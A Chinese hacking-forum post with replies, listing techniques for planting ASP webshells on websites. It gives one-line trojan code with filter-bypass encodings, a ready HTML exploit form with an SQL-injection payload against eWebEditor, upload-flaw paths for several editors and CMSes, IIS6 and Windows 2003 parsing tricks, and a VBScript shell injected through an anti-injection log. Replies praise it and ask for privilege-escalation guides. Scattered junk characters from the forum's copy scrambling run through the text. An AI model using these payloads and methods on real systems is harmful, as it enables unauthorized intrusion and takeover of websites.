返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式4 R  Y3 H1 R# E/ y! Q4 o! a( b& _
) l! S! g8 K, l6 Q
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp9 ?6 d9 Z: M- l

& c7 u7 E: _4 J, v" X: D0 j3.上传漏洞:
. Y/ f' h  s1 F0 O% V8 r( i/ V5 Z& w; J( y0 N* u% }# Z
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
2 x7 B4 t0 f! s
6 n5 [! E* q3 `( K逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
' }$ z, f5 s' A: }! R: P2 _8 j1 r6 v" v/ W3 I( s5 Y
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp, E6 ^9 \* y5 \8 t% P) c  S
然后在上传文件里面填要传的图片格式的ASP木马
, c7 U) ?8 i& \" S. [( ~+ X就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp3 s  \" S/ E4 M
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传7 L+ S9 r# u0 O& ~4 L
- \, w! R4 B/ _% k1 D; A
<html>
# `+ y/ h2 y3 T+ |, `  g1 E<head>
: @; c5 W7 N$ G( o7 ^( g<title>ewebeditor upload.asp上传利用</title>$ P& Q" p2 W; w) }, _
</head>
1 [- H/ ^2 t1 N5 [3 e- ?) }$ F<body>
+ v  g3 f8 C% W( g<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
% [+ |0 x" c" b6 Q<input type=file name=uploadfile size=100><br><br>( {+ E9 e7 c$ R* e# W9 i; @
<input type=submit value=Fuck>9 k) X* T* H. k/ b4 q4 s* V5 g
</form>
: ^/ _# Y# {2 w</body>
2 e8 ~$ O7 _! r4 {1 @# p& I</form>
$ Q$ P3 w5 U4 B: H) t" M</html>
) z3 x& n  \+ N/ s
6 z5 h' a/ a7 h3 ]& s$ i2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
( `% T# c$ S& o9 f/ j- e5 G5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp7 i: }% a( B- v1 y
- A) l- ^6 ]$ u: y
利用windows2003解析。建立zjq.asp的文件夹/ Z; f/ J* ]) P, D3 c
; |( B' o/ ^# w0 Y- _+ t
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型# N8 i0 z# l* e% }% e$ z5 h# [" o

4 U6 ?5 M+ e$ ]; t' R% d7.cuteeditor:类似ewebeditor1 ~  o- D' K* e( k$ C9 l' [; Z) L

0 U5 V# H" D5 V' W7 Q: A' h8.htmleditor:同上
; y3 g* R- F: L$ Z
" y: t+ v0 A. h1 b4 e- B) h1 X9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
2 n$ J0 O: K) _/ o2 D+ W( Y) `0 D+ P4 j3 A* P& c3 _
<%execute request("value")%><%'<% loop <%:%>0 F" q  A  @! S

) a9 H/ m  ~; X9 T' ?<%'<% loop <%:%><%execute request("value")%>. G3 Z$ @8 |- q% I9 u9 J
) S1 v: |+ O; x3 {: C
<%execute request("value")'<% loop <%:%>, _# @  S) X9 i. n1 k
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞0 k$ g( F# h- E$ h, Y

7 `7 I( l# a6 c/ I" N/ A10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞5 Y) o6 L' Y1 I5 h
1 T/ e, s7 o/ n5 N1 y' T
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k39 W8 q# c+ f  h8 W1 ?+ X8 Y
4 a% l" d, ?1 k, M3 L8 N
解析漏洞得到webshell) P9 S3 i" H6 N" Y1 A; J& A" h; ^$ M
0 k: m( n$ Y. C% Q
12.mssql差异备份,日志备份,前提需知道web路径2 n6 n3 X/ N- b2 F; {

" E1 u; {& N% [. G13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
* [7 ^$ K" F) P' E6 B0 ^$ i8 Z  ^, v& l" H) E
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
" K3 X. |& H$ I. O  I* s
& A) m7 z$ l  J8 y+ [3 W  v7 a$ U15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
/ s. u% F; X/ {6 @6 `  q2 h9 _( a
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
2 k& j. \, @& W0 U不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
) c' h% p# N  J
) T6 j  m& S# r* E$ n2 G$ Y
) \9 A9 v, ~7 J很好啊、基本的入侵方法都包含了
( i4 H6 R3 }4 F: d6 d" V- c4 f8 n  G0 ^; V
最好来个提权的帖子再。5 D# i9 j" r* T$ p
0 h  F. e. w9 W
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表